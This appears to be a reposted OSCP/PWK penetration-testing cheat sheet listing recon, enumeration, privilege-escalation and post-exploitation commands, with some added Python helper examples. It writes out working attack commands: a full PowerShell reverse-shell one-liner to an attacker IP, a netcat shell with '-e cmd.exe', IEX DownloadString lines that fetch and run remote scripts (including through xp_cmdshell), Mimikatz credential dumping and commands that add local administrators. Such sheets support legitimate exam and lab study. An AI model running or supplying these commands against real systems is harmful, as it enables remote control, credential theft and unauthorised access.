Pentestmonkey Reverse Shell Cheat Sheet



Reverse Shell Cheat Sheet. You can find them all around the internet. I couldn't find them all in one place, so I wrote them down here. Don't hesitate to tell me if you find some more and I will add them to this list. The very good Pentestmonkey PHP reverse shell. OSCP Cheatsheet: Reverse Shell One-Liners. OSCP labs, red teaming, CTFs and real penetration tests are full of challenges where our goal is, or may be, to compromise a particular target. We are not always lucky enough to get complete GUI or interactive access to the remote system. In most scenarios we compromise the target machine using system-level misconfigurations, vulnerable services, kernel.

Forked from sinfulz: "JustTryHarder" is his "cheat sheet which will aid you through the PWK course & the OSCP Exam."
So here:

JustTryHarder, a cheat sheet which will aid you through the PWK course & the OSCP Exam.

(Inspired by PayloadAllTheThings)

Feel free to submit a Pull Request & leave a star to share some love if this helped you. 💖

Disclaimer: none of the below includes spoilers for the PWK labs / OSCP Exam.

Credit Info: I have obtained a lot of this info through other GitHub repos, blogs, sites and more. I have tried to give as much credit to the original creator as possible; if I have not given you credit, please contact me on Twitter: https://twitter.com/s1nfulz

Active Directory & Domain Controllers

  • WIP

BOF (WIP)

(Bad characters to exclude from the start: 0x00 (null) and 0x0A (line feed). 0x0D (carriage return) is bad for most text-based protocols too, so test for it rather than assuming it is fine.)

  • Fuzzing
  • Finding eip position
  • Finding bad chars
  • Locating jmp esp
  • Generating payload with msfvenom
  • Getting reverse shell with netcat

DNS - Zone Transfers

  • host -t axfr HTB.local 10.10.10.10
  • host -l HTB.local 10.10.10.10
  • host -l
  • dig @

#Churrasco (Windows Server 2003 token-kidnapping privesc, run from a low-priv shell)

  • churrasco -d "net localgroup administrators USERNAME /add"
  • churrasco -d "NET LOCALGROUP "Remote Desktop Users" USERNAME /ADD"

Post Exploitation

#Mimikatz (run as local administrator; privilege::debug needs SeDebugPrivilege)
  1. mimikatz.exe (run it)
  2. privilege::debug
  3. sekurlsa::logonpasswords

Port Forwarding

#Chisel

#Plink

#SSH

  • ssh root@10.10.10.10 -R 1234:127.0.0.1:1234 (remote forward: connections to 127.0.0.1:1234 on 10.10.10.10 are tunnelled back to 127.0.0.1:1234 on the Kali box)

Port Scanning

#TCP

  • reconnoitre -t 10.10.10.10 -o . --services --quick --hostnames
  • nmap -vvv -sC -sV -p- --min-rate 2000 10.10.10.10
  • nmap -sT -p 22,80,110 -A 10.10.10.10
  • nmap -p- -iL ips.txt > TCP_Ports.txt

#UDP (a full UDP scan can take hours; if you already have a shell on the box, netstat on the target (see "Show listening ports") is far quicker)

  • nmap -sU --top-ports 10000 10.10.10.10
  • nmap -sT -sU -p 22,80,110 -A 10.10.10.10
  • nmap -sT -sU -p- --min-rate 2000 10.10.10.10
  • nmap -p- -sU -iL ips.txt > udp.txt
  • nmap -sU -sV -iL ips.txt > alludpports.txt

#SNMP

  • nmap -sU -p 161 -iL ips.txt > snmp.txt (written to its own file so it does not clobber udp.txt from the UDP scan above)

#SSH

  • nmap -p 22 --script ssh2-enum-algos -iL ips.txt > SSH.txt

#SSL

  • nmap -vv --script ssl-cert,ssl-enum-ciphers,ssl-heartbleed,ssl-poodle,sslv2 -iL ips.txt > SSLScan.txt

PowerShell

  • powershell -ExecutionPolicy ByPass -File script.ps1

Pivoting

  • sshuttle -r user@10.10.10.10 10.1.1.0/24

Remote Desktop

rdesktop -u user -p password 10.10.10.10 -g 85% -r disk:share=/root/

Reverse Shells

#Linux

  • http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
  • https://awansec.com/reverse-shell.html

#Windows

  • https://github.com/Dhayalanb/windows-php-reverse-shell
  • nc [YourIPaddr] [port] -e cmd.exe (-e needs a netcat build that supports it, e.g. nc.exe from /usr/share/windows-binaries on Kali; listen first on Kali with nc -lvnp [port])

Shell Upgrading

Source: https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/ & https://forum.hackthebox.eu/discussion/142/obtaining-a-fully-interactive-shell

SQL Injection (SQLmap)

  • sqlmap -u "http://example.com/test.php?test=test" --level=5 --risk=3 --batch (--risk=3 enables OR-based payloads that can modify data, so use it with care on real targets)

Python

  1. python -c 'import pty; pty.spawn("/bin/bash")'  or
  2. python3 -c 'import pty; pty.spawn("/bin/bash")'
  3. In reverse shell: python -c 'import pty; pty.spawn("/bin/bash")' then press Ctrl-Z to background the shell
  • In Kali
    1. stty raw -echo
    2. fg
  • In reverse shell
    1. reset (sometimes optional)
    2. export SHELL=bash
    3. export TERM=xterm-256color
    4. stty rows <rows> columns <cols> (optional; take the two numbers from running stty size in a Kali terminal) (sometimes export TERM=xterm is needed instead)


Using socat

Perl

  1. perl -e 'exec "/bin/sh";'
  2. perl: exec "/bin/sh";

Bash

/bin/sh -i

Show listening ports

  • Linux netstat syntax
    1. netstat -tulpn | grep LISTEN (the grep hides the UDP lines, which have no state column; drop it, or use ss -tulpn, to see bound UDP ports too)
  • FreeBSD/macOS netstat syntax
    1. netstat -anp tcp | grep LISTEN
    2. netstat -anp udp (UDP sockets never show LISTEN, so grepping for it returns nothing)
  • OpenBSD netstat syntax
    1. netstat -na -f inet | grep LISTEN
    2. netstat -nat | grep LISTEN
  • Nmap scan syntax
    1. sudo nmap -sT -O localhost
    2. sudo nmap -sU -O 192.168.2.13 ##[ list open UDP ports ]##
    3. sudo nmap -sT -O 192.168.2.13 ##[ list open TCP ports ]##
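What those netstat invocations read on Linux is /proc/net/tcp (and /proc/net/udp), which matters on a stripped-down target that has neither netstat nor ss. The Python below is an added example, not from the sheet: it decodes that file's hex address/port columns and state byte the way netstat -tln does, runs over constructed sample lines, and, when /proc/net/tcp exists on the machine it runs on, over the live table as well.

```python
#!/usr/bin/env python3
"""Added example: decode /proc/net/tcp the way netstat -tln does, for boxes
with no netstat/ss. The sample lines below are constructed, not captured."""
import os
import socket
import struct

LISTEN = "0A"      # TCP state codes are hex: 0A = LISTEN, 01 = ESTABLISHED
UDP_BOUND = "07"   # UDP has no LISTEN; a bound UDP socket sits in 07 (UNCONN)

# Constructed sample in /proc/net/tcp format: sshd on 0.0.0.0:22 (listening),
# mysql on 127.0.0.1:3306 (listening) and one established outbound connection.
SAMPLE_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 18921 1 0000000000000000 100 0 0 10 0
   1: 0100007F:0CEA 00000000:0000 0A 00000000:00000000 00:00000000 00000000   112        0 20443 1 0000000000000000 100 0 0 10 0
   2: 0F02000A:B3CC 1A0A0A0A:01BB 01 00000000:00000000 00:00000000 00000000  1000        0 31877 1 0000000000000000 20 4 30 10 -1
"""


def decode_addr(field: str):
    """'0100007F:0CEA' -> ('127.0.0.1', 3306). The IPv4 is stored as one
    little-endian 32-bit hex word, the port as plain big-endian hex."""
    ip_hex, port_hex = field.split(":")
    ip = socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16)))
    return ip, int(port_hex, 16)


def sockets_in_state(text: str, state: str):
    """Return sorted (ip, port) pairs whose state column equals `state`."""
    found = []
    for line in text.splitlines()[1:]:        # first row is the header
        cols = line.split()
        if len(cols) < 4:
            continue
        if cols[3] == state:
            found.append(decode_addr(cols[1]))   # cols[1] is local_address
    return sorted(found, key=lambda t: (t[1], t[0]))


def listening_tcp(text: str):
    """The netstat -tln view: only sockets in LISTEN."""
    return sockets_in_state(text, LISTEN)


def live_listeners(path: str = "/proc/net/tcp"):
    """Read the real table when running on Linux; None elsewhere."""
    if not os.path.exists(path):
        return None
    with open(path) as fh:
        return listening_tcp(fh.read())


if __name__ == "__main__":
    for ip, port in listening_tcp(SAMPLE_TCP):
        print("LISTEN %s:%d" % (ip, port))
    live = live_listeners()
    if live is not None:
        print("live:", live)
```

/proc/net/tcp6 has the same layout with a 32-hex-digit address, and the same state byte; the UDP_BOUND constant is what to match in /proc/net/udp.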

SMB - Enumeration

  • https://0xdf.gitlab.io/2018/12/02/pwk-notes-smb-enumeration-checklist-update1.html
  • smbmap -H 10.10.10.10
  • smbclient -L 10.0.0.10
  • smbclient //10.10.10.10/share$

SMB - Impacket

  • Impacket's PSEXEC (after creating a remote port fwd)
    /usr/share/doc/python-impacket/examples/psexec.py user@10.10.10.10

Password: (password)

[*] Trying protocol 445/SMB…

  • Impacket's SMBServer (for file transfer; "a" is the share name, "." the directory being served)
    1. cd /usr/share/windows-binaries
    2. python /usr/share/doc/python-impacket/examples/smbserver.py a .
    3. On the target: \\10.10.10.10\a\mimikatz.exe (runs straight from the share; or copy \\10.10.10.10\a\mimikatz.exe . first)

SMTP Enumeration

https://github.com/s0wr0b1ndef/OSCP-note/blob/master/ENUMERATION/SMTP/smtp_commands.txt

VMware (not going full screen)

  • systemctl restart open-vm-tools.service

Web Servers:

  • python -m SimpleHTTPServer 80
  • python3 -m http.server 80
  • ngrok http 80

Web Scanning:

#Web Scanning with extensions

#HTTP

  • gobuster dir -u http://10.10.10.10/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 69
  • gobuster dir -u http://10.10.10.10 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,html,txt -t 69

#HTTPS

  • gobuster dir -k -u https://10.10.10.10/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 69 (-k skips certificate verification; if the site answers every path, --wildcard is needed in addition so gobuster keeps going)

#Nikto

  • nikto -h 10.10.10.10 -p 80

#Nikto HTTPS

  • nikto -h 10.10.10.10 -p 443 -ssl

WFuzz

  • wfuzz -u "http://google.com/login.php?username=admin&password=FUZZ" -w /usr/share/wordlists/rockyou.txt (quote the URL so the shell does not treat & as a background operator; hide the failed-login responses by size with --hh or by status with --hc)
  • wfuzz -u "http://10.10.10.10/hello.php?dir=../../../../../../../../../FUZZ%00" -w /usr/share/wfuzz/wordlist/general/common.txt
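What gobuster -x and wfuzz's FUZZ do is plain: expand a wordlist against a URL template, fire the requests concurrently, and hide the responses that look like "not found". The Python below is an added example, not part of the sheet or of either tool: it starts a throw-away local web app with three known paths so the run works offline, then brute-forces it with a constructed four-word list and two extensions, hiding 404s the way gobuster does by default and optionally hiding by response length, which is wfuzz's --hh for the login case above.

```python
#!/usr/bin/env python3
"""Added example: a small gobuster/wfuzz-style brute-forcer run against a
constructed local target so it works offline. Not from the original sheet."""
import http.server
import threading
import urllib.error
import urllib.request
from concurrent.futures import ThreadPoolExecutor

# Constructed target: three "real" paths; every other path is a 404.
KNOWN_PATHS = {
    "/admin": b"admin panel",
    "/config.php": b"<?php",
    "/robots.txt": b"User-agent: *",
}


class _TargetHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        body = KNOWN_PATHS.get(self.path)
        status = 200 if body is not None else 404
        body = body if body is not None else b"not found"
        self.send_response(status)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):   # keep the demo output clean
        pass


def start_target():
    """Serve KNOWN_PATHS on 127.0.0.1:<random port> in a daemon thread."""
    srv = http.server.ThreadingHTTPServer(("127.0.0.1", 0), _TargetHandler)
    srv.daemon_threads = True
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, "http://127.0.0.1:%d" % srv.server_address[1]


def candidates(words, exts):
    """gobuster -x php,txt: each word bare, then with every extension."""
    for w in words:
        yield "/" + w
        for e in exts:
            yield "/%s.%s" % (w, e)


def probe(base, path, timeout=5):
    """One request; returns (path, status, body length) even on 4xx/5xx."""
    try:
        with urllib.request.urlopen(base + path, timeout=timeout) as resp:
            return path, resp.status, len(resp.read())
    except urllib.error.HTTPError as err:
        return path, err.code, len(err.read())


def dirbust(base, words, exts, hide_codes=(404,), hide_lengths=(), threads=10):
    """Concurrent brute-force. hide_codes mirrors gobuster's default / wfuzz
    --hc; hide_lengths mirrors wfuzz --hh (hide the 'login failed' size)."""
    with ThreadPoolExecutor(max_workers=threads) as pool:
        results = list(pool.map(lambda p: probe(base, p), candidates(words, exts)))
    return sorted(
        (p, code, size) for p, code, size in results
        if code not in hide_codes and size not in hide_lengths
    )


def demo():
    """Brute-force the local target with a constructed wordlist; return hits."""
    srv, base = start_target()
    try:
        return dirbust(base, ["admin", "config", "robots", "backup"], ["php", "txt"])
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    for path, code, size in demo():
        print("%-14s %d  (%d bytes)" % (path, code, size))
```

Against a real host the only changes are the base URL and a real wordlist; the -t 69 in the gobuster lines is the `threads` argument here, and a wildcard-responding site shows up as every candidate coming back with the same status and length, which is exactly what hide_lengths is for.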

Web Shells

  • https://github.com/Arrexel/phpbash
  • https://github.com/flozz/p0wny-shell

WordPress

  • https://forum.top-hat-sec.com/index.php?topic=5758.0

Windows Framework / Powershell

#Bypass PowerShell execution policy

  • PowerShell -Exec Bypass

#Reverse shell one-liner (change the IP/port; listen first on Kali with nc -lvnp 443)

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.1.3.40',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

#Download and run a script in memory

echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.10:80/PowerUp.ps1') | powershell -noprofile -

IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.10:80/PowerUp.ps1')

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.x/Whatever.ps1'); Invoke-Whatever"

(IEX must sit outside the quoted string: quoting the whole DownloadString call inside IEX only prints the script text instead of running it, and Invoke-Whatever is then undefined)

Via MSSQL: EXEC xp_cmdshell 'powershell IEX(New-Object Net.WebClient).DownloadString(''http://10.10.10.10/Nishang-ReverseShell.ps1'')'

Windows Post Exploitation Commands

  • WMIC USERACCOUNT LIST BRIEF
  • net user
  • net localgroup Users
  • net localgroup Administrators
  • net user USERNAME NEWPASS /add
  • net user "USER NAME" NEWPASS /add
  • net localgroup administrators USERNAME /add

Writeable Directories (Work in progress)

  • C:\Windows\System32\spool\drivers\color
  • C:\Windows\tracing
  • C:\Windows\Tasks
  • C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
  • To find world-writeable directories in Linux (skipping sticky-bit dirs like /tmp, and staying on one filesystem):
    find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print 2>/dev/null
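The find expression above has two tests that are easy to misread: -perm -0002 (the "other" write bit is set) and ! -perm -1000 (no sticky bit, so files planted there can be replaced by anyone, unlike /tmp). The Python below is an added example, not from the sheet: it implements the same walk, including -xdev pruning, and builds a constructed temporary tree so you can see exactly which directories get reported.

```python
#!/usr/bin/env python3
"""Added example: the find expression above in Python, plus a constructed
directory tree showing which directories it reports. Not from the sheet."""
import os
import stat
import tempfile


def is_world_writable_dir(path: str) -> bool:
    """-type d -perm -0002 ! -perm -1000: a directory anyone can write to
    that has no sticky bit (with sticky, as on /tmp, users can only remove
    their own entries, which is far less useful for planting payloads)."""
    st = os.lstat(path)
    return (
        stat.S_ISDIR(st.st_mode)
        and bool(st.st_mode & stat.S_IWOTH)
        and not (st.st_mode & stat.S_ISVTX)
    )


def world_writable_dirs(root: str):
    """find ROOT -xdev -type d ( -perm -0002 -a ! -perm -1000 ): walk the
    tree without crossing into other filesystems (-xdev)."""
    root_dev = os.lstat(root).st_dev
    hits = []
    for dirpath, dirnames, _files in os.walk(root):
        # -xdev: prune mount points (different st_dev) before descending
        dirnames[:] = [d for d in dirnames
                       if os.lstat(os.path.join(dirpath, d)).st_dev == root_dev]
        if is_world_writable_dir(dirpath):
            hits.append(dirpath)
    return sorted(hits)


def demo_tree() -> str:
    """Constructed tree: a dropbox-style dir (0777), a /tmp-style sticky dir
    (1777), an ordinary dir (0755) and a writable dir nested inside the
    ordinary one. Returns the root path (itself 0700, so never reported)."""
    root = tempfile.mkdtemp(prefix="ww_")
    for name, mode in (("dropbox", 0o777), ("sticky_tmp", 0o1777),
                       ("plain", 0o755), ("plain/inner_open", 0o777)):
        p = os.path.join(root, name)
        os.mkdir(p)
        os.chmod(p, mode)   # explicit chmod: os.mkdir's mode is masked by umask
    return root


def demo():
    """Return the world-writable dirs of the demo tree, relative to its root."""
    root = demo_tree()
    return [os.path.relpath(p, root) for p in world_writable_dirs(root)]


if __name__ == "__main__":
    for d in demo():
        print(d)
```

Only dropbox and plain/inner_open come back: the sticky directory is excluded even though its mode also has the other-write bit, which is the point of the ! -perm -1000 clause.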
